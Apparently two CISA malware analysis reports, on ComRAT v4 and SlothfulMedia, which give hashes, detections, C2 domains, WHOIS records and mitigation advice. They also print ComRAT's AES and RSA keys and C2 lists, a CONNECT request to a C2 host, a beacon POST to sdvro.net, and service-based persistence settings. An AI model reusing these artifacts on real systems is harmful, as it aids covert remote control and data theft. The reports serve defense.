SHA256 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
SHA512 6f2fe02c1e15be2409f89ff1e6ae3c78f87e242ee448fe5ff6d375a74f10c7c6cc01f3f6d796aa34599a891e03c5d421d10f0c041e5a6dc0e346aea3ae21a935
ssdeep 49152:jTRjrgdOU9p1PZH/JNTFTJT5dwIwzQJH:PRCBNTBwAH
Entropy 6.463931
Antivirus
Ahnlab Trojan/Win64.Turla
ESET a variant of Win64/Turla.BX trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-06 09:38:38-05:00
Import Hash d9d661a606c9d1c23b47672d1067de68
PE Sections
MD5 Name Raw Size Entropy
11525199e6e248e88e0529cf72a9002d header 1024 2.934959
0f3258519a92690d14406e141dcb285b .text 1027584 6.441800
fa4840dc4653443d4574486df39bc6a3 .rdata 481280 4.896843
ca22c78d526550925d7843a24cd1d266 .data 264704 7.368343
f7cc8fa49cfa87a125d8354082e162f3 .pdata 47104 6.030652
ef6fdd7440f36ba21373b4585a5c83e4 .rsrc 512 4.724729
4f16258cf938a4bc7fe0ae92121f442d .reloc 5632 5.425381
Relationships
44d6d67b53… Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
44d6d67b53… Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
44d6d67b53… Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
Description

This application is a 32-bit Windows DLL that has been identified as a module of ComRAT v4. The DLL is loaded into Windows Explorer (Explorer.exe) by a ComRAT PowerShell loader (a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642). When executed, it checks the victim’s system daytime and it performs code execution between 9AM to 5PM Monday through Friday. During execution, it installs the following files into the %TEMP% folder:

–Begin files–
“%TEMP%iecache.bin” ==> an AES-256-XTS encrypted VFS FAT16 format, containing the malware configuration and the logs files. (The encryption key is generated during runtime and stored in the Windows registry).
“%TEMP%FSAPIDebugLogFile.txt
–End files–

The malware injects an embedded communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d or (166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405) into the victim system’s default browser and executes it. This file and the communication module communicate with each other using a named pipe. The malware uses the named pipe to send HTTP requests and receive HTTP responses to and from the communication module for backdoor commands. It is designed to use the Gmail web interface to receive commands and exfiltrate data.

Illustrated below are sample data observed in the decrypted VFS in FAT16 format. Some of these files can be updated in the VFS using backdoor commands.

–Begin sample data in the VFS —
“/etc/pal/” contains a list of C2 domains: “bronerg.tk|crusider.tk|duke6.tk”
“/etc/gal.bin” contains a list of C2 domains: “sanitar.ml|wekanda.tk|branter.tk”
“/etc/pki/aes_key.pki” : Contains the Advanced Encryption Standard (AES) encryption keys for the C2 communications:

–Begin AES key–
4F8112E9E5AB5391C584D567B58E539F0400094A83EA0C2DDC7FA455FCF447B1
–End AES key–

“/etc/pki/public_cert.pki” contains the Rivest–Shamir–Adleman (RSA) encryption key used for the C2 communications:

–Begin RSA key–
BE51E00093CEB0A5FCAE59EB4EEEB3079D1CB17FC195321587CB513003826917B0BC13EB3B9A4209A4FFAF19C07249D360F447A6FAE3936612516A152619B800C4BE12FFF7077D7AF959ABBFD0A1BC06CD3B9D8DBC079307D79B78E4C7F114DE3B530DF40E40C14299D47CD6530A765B1F2717EAA66AD139B3F6728AFFFC5B6AB3E2B36FB062AD167E2B4450A295038A211E0A8E8BFE01FE338ACF883518099663E95B6266AB037224A32853002A47248012567455AC75939FDFC4018D86C2A6D72770887A8FE0678F5E7BC527FB4787D70923FC6909ACF8DC651F93B5E537ABF860B3262723FB2181E9132E381D892A8864BAB38687231B1E47C00BF10BC445010001
–End RSA key–

It uses the public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.
“/etc/mail/subj_dict” contains the the Subject “Re: |RE: |FW: |FWD: | Fw: | Fwd:| FYI: |FYIP |NRN: | NT: | N/T | n/t| NB |NM| n/m |N/M: |*n/m*”

“/etc/php_storage/GET/DEF/server.txt ” and “/etc/php_storage/POST/DEF/server.txt” contains server IP “172.22.150.125”.
–End sample data in the VFS —

Screenshots

Figure 3 - The first bytes of the decrypted VFS in FAT16 format.

Figure 3 – The first bytes of the decrypted VFS in FAT16 format.

Figure 4 - The decrypted VFS hierarchy, containing the malware configuration and the logs files.

Figure 4 – The decrypted VFS hierarchy, containing the malware configuration and the logs files.

00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d

Tags

backdoordownloaderloadertrojan

Details
Name Communication_module_32.dll
Size 61440 bytes
Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5 e509c3a40045d2dab9404240f3f201ed
SHA1 86f747cac3b16ed2dab6d9f72a347145ff7a850d
SHA256 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
SHA512 f78827b6fc258f4a63dd17fec2acb7114329a9d7fd426c72838f2e5e5c54c12fce7be7a0eb9c7e7e74b01fe80c42293ef89c3bcbafd230a68f9639e57f62bb6f
ssdeep 1536:zlAjaBOUFoD0C8YQ7aZS7C2kkAxWzg39xa3cdjrH++:zl2uOUG0CBQ7aZS7C3uzg39xEM
Entropy 5.338807
Antivirus
Antiy Trojan[Backdoor]/Win32.Turla
Avira TR/Crypt.XPACK.Gen3
ESET a variant of Win32/Turla.EO trojan
Ikarus Trojan-Downloader.Win32.Farfli
NANOAV Trojan.Win32.Turla.hlrzcr
Symantec Heur.AdvML.B
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-06 09:36:54-05:00
Import Hash 87ab41c57e95562a3e81f0609398b278
PE Sections
MD5 Name Raw Size Entropy
b9bd1636e8c11ff1ab2368771e89cfac header 4096 0.612975
077bf2412ba289da7b6261ffec65988d .text 49152 6.051754
1c95870051ff12b740487ff93d19ef3b .rdata 4096 0.317233
b86e403ac8c58a013fe4cda6b6715804 .reloc 4096 0.019202
Relationships
00352afc7e… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
00352afc7e… Connected_To branter.tk
00352afc7e… Connected_To wekanda.tk
00352afc7e… Connected_To sanitar.ml
00352afc7e… Connected_To duke6.tk
00352afc7e… Connected_To bronerg.tk
00352afc7e… Connected_To crusider.tk
Description

This application is a 32-bit Windows DLL that has been identified as the communication module injected into the victim’s system default browser by “ComRATv4.exe” (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). It is designed to use the HTTP and a Gmail web interface for the C2. It attempts to connect to its C2 using secure connections.

–Begin list of domains–
bronerg.tk
crusider.tk
duke6.tk
sanitar.ml
wekanda.tk
branter.tk
–End list of domains–

Displayed below is sample request header:

–Begin header–
CONNECT bronerg[.]tk:443 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: bronerg.tk:443
Content-Length: 0
Connection: Keep-Alive
–End header–

bronerg.tk

Tags

command-and-control

Whois

Domain name:
    BRONERG.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
bronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
bronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
Description

ComRAT v4 C2 domain.

crusider.tk

Tags

command-and-control

Ports
  • 443 TCP
Whois

Domain name:
    CRUSIDER.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
crusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
crusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
Description

ComRAT v4 C2 domain.

duke6.tk

Tags

command-and-control

Whois

Domain name:
    DUKE6.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
duke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
duke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

sanitar.ml

Tags

command-and-control

Whois

Domain name:
    SANITAR.ML

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
sanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
sanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

wekanda.tk

Tags

command-and-control

Whois

Domain name:
    WEKANDA.TK

Organisation:
    Freedom Registry, Inc.
    2225 East Bayshore Road #290
    Palo Alto CA 94303
    United States
    Phone: +1 650-681-4172
    Fax: +1 650-681-4173

Domain Nameservers:
    NS01.FREENOM.COM
    NS02.FREENOM.COM
    NS03.FREENOM.COM
    NS04.FREENOM.COM

Relationships
wekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
wekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

branter.tk

Tags

command-and-control

Ports
  • 443 TCP
Whois

No Whois record at the time of analysis.

Relationships
branter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
branter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
Description

ComRAT v4 C2 domain.

166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405

Tags

trojan

Details
Name Communication_module_64.dll
Size 64000 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 54902e33dd6d642bc5530de33b19e43c
SHA1 a06f0e29fca6eb29bf5334fb3b84a872172b0e28
SHA256 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
SHA512 28b8f63af33f4aebd2b5b582750036db718f657640aca649d4b2b95188661da3834398a56184ee08f64ddf1d32198e722be46dbfbc78e49e0d276fe6c5234b94
ssdeep 1536:p2JmzHKhyOjQuCLA/9zYgJS7aWSXEuT2XWZdjoEGbgqPU6Izj6N1o6OtAEBiUm5+:p2JmcjQuCLA/VYgJS7H21yXQdj5G0qMy
Entropy 5.939047
Antivirus
ESET a variant of Win64/Turla.CN trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2018-03-06 09:37:48-05:00
Import Hash 87ab41c57e95562a3e81f0609398b278
PE Sections
MD5 Name Raw Size Entropy
199ab75383a70bd1148671ca1c689d0e header 1024 2.031353
46c52ca20a919c2314e32193eac9ec66 .text 60416 5.990363
a97e460909f791b5d0b571099a5b7b56 .rdata 1536 4.519592
c5ba9ad86e832155180da146aef6eabc .pdata 1024 3.061435
Relationships
166b1fb3d3… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
166b1fb3d3… Connected_To bronerg.tk
166b1fb3d3… Connected_To crusider.tk
166b1fb3d3… Connected_To duke6.tk
166b1fb3d3… Connected_To sanitar.ml
166b1fb3d3… Connected_To wekanda.tk
166b1fb3d3… Connected_To branter.tk
Description

This application is a 64-bit Windows DLL that has been identified as the communication module injected into the victim’s system default browser by “ComRATv4.exe” (44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316). The DLL is similar to the 32-bit communication module (00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d).

Relationship Summary

1349191514… Contains a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
a3170c32c0… Contained_Within 134919151466c9292bdcb7c24c32c841a5183d880072b0ad5e8b3a3a830afef8
a3170c32c0… Dropped 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
44d6d67b53… Contains 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
44d6d67b53… Contains 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
44d6d67b53… Dropped_By a3170c32c09fc85cdda778a5c20a3dab144b6d1dd9996ba8340866e0081c7642
00352afc7e… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
00352afc7e… Connected_To branter.tk
00352afc7e… Connected_To wekanda.tk
00352afc7e… Connected_To sanitar.ml
00352afc7e… Connected_To duke6.tk
00352afc7e… Connected_To bronerg.tk
00352afc7e… Connected_To crusider.tk
bronerg.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
bronerg.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
crusider.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
crusider.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
duke6.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
duke6.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
sanitar.ml Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
sanitar.ml Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
wekanda.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
wekanda.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
branter.tk Connected_From 00352afc7e7863530e4d68be35ae8b60261fc57560167645697b7bfc0ac0e93d
branter.tk Connected_From 166b1fb3d34b32f1807c710aaa435d181aedbded1e7b4539ffa931c2b2cdd405
166b1fb3d3… Contained_Within 44d6d67b5328a4d73f72d8a0f9d39fe4bb6539609f90f169483936a8b3b88316
166b1fb3d3… Connected_To bronerg.tk
166b1fb3d3… Connected_To crusider.tk
166b1fb3d3… Connected_To duke6.tk
166b1fb3d3… Connected_To sanitar.ml
166b1fb3d3… Connected_To wekanda.tk
166b1fb3d3… Connected_To branter.tk

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

 

Revisions

  • October 29, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: October 1, 2020

Description

 

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as SlothfulMedia, has been used by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduced exposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.

The sample is a dropper, which deploys two files when executed. The first is a remote access tool (RAT) named ‘mediaplayer.exe’’, which is designed for command and control (C2) of victim computer systems. Analysis has determined the RAT has the ability to terminate processes, run arbitrary commands, take screen shots, modify the registry, and modify files on victim machines. It appears to communicate with its C2 controller via Hypertext Transfer Protocol (HTTP) over Transmission Control Protocol (TCP).

The second file has a random five-character name and deletes the dropper once the RAT has persistence. Persistence is achieved through the creation of a service named “Task Frame”, which ensures the RAT is loaded after a reboot.

Users or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious cyber activity, please visit https[:]//www[.]us-cert.gov.

For a downloadable copy of IOCs, see MAR-10303705-1.v1.stix.

Submitted Files (1)

64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273 (448838B2A60484EE78C2198F2C0C9C…)

Additional Files (2)

4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa (wHPEO.exe)

927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae (mediaplayer.exe)

Domains (1)

sdvro.net

Findings

64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273

Tags

botdropperinformation-stealerkeyloggerremote-access-trojantrojan

Details
Name 448838B2A60484EE78C2198F2C0C9C85
Size 117760 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 448838b2a60484ee78c2198f2c0c9c85
SHA1 f2c43a01cabaa694228f5354ea8c6bcf3b7a49b3
SHA256 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
SHA512 9e532af06e5f4764529211e8c5c749baa7b01c72f11b603218c3c08d70cf1e732f8d9d81ec257ca247aaa96d1502150a2f402b1b3914780b6344222b007dd53f
ssdeep 3072:PGA5q4Xmco7ciR7BiU+q+TESaiQ4RHpxJdW:O0qtUYBiU+qRiQy
Entropy 6.156007
Antivirus
BitDefender Dropped:Generic.Malware.Fdldg.B04B59A4
Comodo TrojWare.Win32.ButeRat.PP
Emsisoft Dropped:Generic.Malware.Fdldg.B04B59A4 (B)
Ikarus Trojan-PWS.Win32.Zbot
Lavasoft Dropped:Generic.Malware.Fdldg.B04B59A4
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-04-29 10:19:52-04:00
Import Hash 3e935061f369e95ac9d62c7cbdf4acf1
PE Sections
MD5 Name Raw Size Entropy
502dceaf120f990b5118230438102568 header 1024 2.390635
1ec70611505f1cebfc859820b45b6cc3 .text 39424 6.506891
dfebe81d71d56100ac07b85046f07b77 .rdata 12288 4.988754
06f5259aac1a4462eaf12334dc0e8daf .data 59392 6.004077
c2d6c399730fd89b16d2b6d6cec5e393 .rsrc 512 5.105006
1587227ab56ecfb9c5b85aaf24d98454 .reloc 5120 3.993742
Packers/Compilers/Cryptors
Microsoft Visual C++ ?.?
Relationships
64d78eec46… Dropped 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa
64d78eec46… Connected_To sdvro.net
64d78eec46… Dropped 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
Description

This file is a 32-bit Windows executable. When executed, it will drop a file called ‘mediaplayer.exe’ (927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) into the path %AppData%Media. A link file called ‘media.lnk’ is also placed in this path. A third file is placed in the path %TEMP% and is given a five character random name with an ‘.exe’ extension, e.g. ‘wHPEO.exe’ (4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa). This file is created with a ‘hidden’ attribute to insure that it is not visible to the user.

Next, the program will create a service on the system called “TaskFrame” with the following parameters:

— Begin Service Parameters —
HKLMSystemCurrentControlSetServicesTaskFrame    Type: 272
HKLMSystemCurrentControlSetServicesTaskFrame    Start: 2
HKLMSystemCurrentControlSetServicesTaskFrame    ErrorControl: 1
HKLMSystemCurrentControlSetServicesTaskFrame    ImagePath: C:Users<user>AppDataRoamingMediamediaplayer.exe
HKLMSystemCurrentControlSetServicesTaskFrame    DisplayName: TaskFrame
HKLMSystemCurrentControlSetServicesTaskFrame    ObjectName: LocalSystem
— End Service Parameters —

This service is used to create persistence on the system and is designed to start the ‘mediaplayer.exe’ (927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) program each time the system is started.

Next, the program will collect system information to send to the command and control (C2). A unique identifier is created and sent in a POST request along with a Unix timestamp of the time of infection to the domain www[.]sdvro.net. Connection attempts are made via both HTTP and HTTPS. The following is a sample of the POST request:

— Begin POST Request —
POST /v?m=u2fssrqh8cl0&i=1598908417 HTTP/1.1
Accept: application/octet-stream,application/xhtml
Content-Length: 436
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75
Host: www[.]sdvro.net
Connection: Keep-Alive
Cache-Control: no-cache

..D……!F.1y^.4.&….{ ..f]..Fz…;..H.L`p..$.H..0A.A(An_8…;..$yH.t..4H…3..K.QvRkX.c..|r r=..V.F…..Hc.H……H.<..tfH….@..uU.@…..uL..D.=o..l!’..D$hH.&.H.f..H.f(..F..n.H..H.$`H.l$pH..0A_A]A_^…H.$.H.t..gH…3..f..K..-.
..|    
=../.:…..Hc.H……H.<..tfH….@..uU.r.0.0.[L..t.
o..2!v..D
hy…p.f..H.f(..F..n.H..H.$`H.l$pH..0A_A]A_^…H.$.H.t$.WH..03..K..K(…3..|$ ;=……….Hc.H……H.:..tWH….@..uU.@…..uL..D.
— End POST Request —

The domain did not resolve to an IP address at the time of analysis. Note: The malware uses the fixed User-Agent string, “Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75” in its communication.

The following notable strings were found in unreferenced data within the file. The purpose of the strings could not be determined. The strings are not used by the code.

— Begin Notable Strings —
C:UsersdavidAppDataRoamingMediamediaplayer.exe
david-pc
— End Notable Strings —

sdvro.net

Tags

command-and-control

Ports
  • 80 TCP
  • 443 TCP
HTTP Sessions
  • POST /v?m=u2fssrqh8cl0&i=1598908417 HTTP/1.1
    Accept: application/octet-stream,application/xhtml
    Content-Length: 436
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75
    Host: www.sdvro.net
    Connection: Keep-Alive
    Cache-Control: no-cache

    ..D……!F.1y^.4.&….{ ..f]..Fz…;..H.L`p..$.H..0A.A(An_8…;..$yH.t..4H…3..K.QvRkX.c..|r r=..V.F…..Hc.H……H.<..tfH….@..uU.@…..uL..D.=o..l!’..D$hH.&.H.f..H.f(..F..n.H..H.$`H.l$pH..0A_A]A_^…H.$.H.t..gH…3..f..K..-.
    ..|    
    =../.:…..Hc.H……H.<..tfH….@..uU.r.0.0.[L..t.
    o..2!v..D
    hy…p.f..H.f(..F..n.H..H.$`H.l$pH..0A_A]A_^…H.$.H.t$.WH..03..K..K(…3..|$ ;=……….Hc.H……H.:..tWH….@..uU.@…..uL..D.

Whois

Domain Name: SDVRO.NET
Registry Domain ID: 2371496862_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.west263.com
Registrar URL: http://www.west.cn/
Updated Date: 2020-03-31T08:26:43Z
Creation Date: 2019-03-21T07:42:43Z
Registry Expiry Date: 2021-03-21T07:42:43Z
Registrar: Chengdu West Dimension Digital Technology Co., Ltd.
Registrar IANA ID: 1556
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: ok https://icann.org/epp#ok
Name Server: NS3.MYHOSTADMIN.NET
Name Server: NS4.MYHOSTADMIN.NET
DNSSEC: unsigned

Domain Name: sdvro.net                
Registry Domain ID: whois protect
Registrar WHOIS Server: whois.west.cn
Registrar URL: www.west.cn
Updated Date: 2019-03-21T07:42:42.0Z
Creation Date: 2019-03-21T07:42:42.0Z
Registrar Registration Expiration Date: 2021-03-21T07:42:42.0Z
Registrar: Chengdu west dimension digital technology Co., LTD
Registrar IANA ID: 1556
Reseller:
Domain Status: ok http://www.icann.org/epp#ok
Registry Registrant ID: Not Available From Registry
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: Chengdu
Registrant State/Province: Sichuan
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: CN
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext:
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext:
Registrant Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Registry Admin ID: Not Available From Registry
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: Chengdu
Admin State/Province: Sichuan
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: CN
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext:
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext:
Admin Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Registry Tech ID: Not Available From Registry
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: Chengdu
Tech State/Province: Sichuan
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: CN
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext:
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext:
Tech Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net
Name Server: ns3.myhostadmin.net
Name Server: ns4.myhostadmin.net
DNSSEC: signedDelegation

Relationships
sdvro.net Connected_From 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273
Description

This domain did not resolve to an IP address at the time of analysis.

927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae

Tags

remote-access-trojan

Details
Name mediaplayer.exe
Size 46080 bytes
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 9f23bd89694b66d8a67bb18434da4ee8
SHA1 db8c6ea90b1be5aa560bfbe5a34577eb284243af
SHA256 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae
SHA512 72e95a90dc8ee2fd69b26665e88d19b1d36527fe8bbc03e252d4be925cf4acae20a3155dcd7caa50daf6e16d201a16822d77356c91654a6e4a05981425574c5b
ssdeep 768:NRw4PZcMc8ie9+dZL6DSKdzxSGyCevVcxjw3e3PxKfRXAxo3vhxfFORpa9sxw:NRwaBiU+dZODSKeGHSaxjw3QUfRH/hx7
Entropy 6.320571
Antivirus
BitDefender Gen:Variant.Fugrafa.6689
Emsisoft Gen:Variant.Fugrafa.6689 (B)
Lavasoft Gen:Variant.Fugrafa.6689
Symantec Heur.AdvML.B
YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata
Compile Date 2019-04-29 10:18:34-04:00
Import Hash db182005fc9fccab434ec0764ea5a244
Company Name Tdl Corporation
File Description Local Security Process
Internal Name None
Legal Copyright Copyright (C) 2018
Original Filename None
Product Name Tdl Corporation
